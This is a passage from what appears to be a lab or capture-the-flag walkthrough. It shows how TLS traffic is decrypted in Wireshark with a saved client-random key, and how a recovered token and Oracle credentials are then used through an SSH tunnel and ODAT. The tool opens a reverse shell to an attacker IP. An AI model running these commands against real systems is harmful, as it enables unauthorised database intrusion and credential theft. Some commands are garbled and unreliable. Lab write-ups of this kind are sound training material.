In this part of the article, we are going to solve JavaDev and DB system.
As you can see in the above diagram, the DB system is mentioned in the network, but JavaDev is not there. JavaDev is not a separate system, the token for that system is hidden in some other files that can be found on a particular system.
Attack on JavaDev: As we recall, we found a debug folder from the SSH system that contains a log file and a pcap file captured by Wireshark.
We opened the debug.txt file, and we found it is a HTTPS encrypted traffic.
On the same text file, we scroll down, and we found Client Nonce and Master Secret key
After googling about both keys, we found that SSL traffic can be decrypted using Wireshark.
Previously, we saved both keys in a separate text file key.txt in this format:
CLIENT_RANDOM 56448610b995cc0f8100560fcf0cf8be7330b2d2f31d86a4259e1ec102f76c50 7cda1b7081ae8a7fae76ca71fbc704ec24796ce5c1f53a15f16325b33946544fd0b1dabde4db187504a74c1138d163bf
Open wireshark then go to File > Preferences
Then select SSL from the protocol section.
Browse for the text file where we have saved our client and nonce key and press OK.
Now load that pcap file in the wireshark.
Now go to Analyze > Decode As
Select SSL from the list.
Now click on Client Hello string and Analyze > Follow SSL Stream.
And we found the token for JavaDev and also the credentials for the database:
DB Attack: Before attacking this system we need two things in our system — Oracle support in Metasploit: https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working- with -Kali-Linux (install version 11.1 only)
ODAT (Oracle Database Attack Toolkit): https://github.com/quentinhardy/odat
Once we have configured both tools on the system we need to create an SSH tunnel to connect to the DB, notice in the network diagram that there is an SSH icon and it is on a different network. Using the command: ssh -nNT -i -f -L 9000:192.168.0.5:1521 [email protected]
Now to connect to the database we have the instance, username and password that we found from JavaDev. Enter the following command:
Now we will use the ODAT tool. Type in : ./odat.py dbmsscheduler -s 127.0.0.1 -p 9000 -d XE -U TESTER1 -P Token_Java_dev_hydrogen1 –reverse-shell 10.10.81.190 443
After running the command it will remove the shell access and then simply find the token with find -name “token” and the output will be /u01/app/oracle/product/11.2.0/xe/token.txt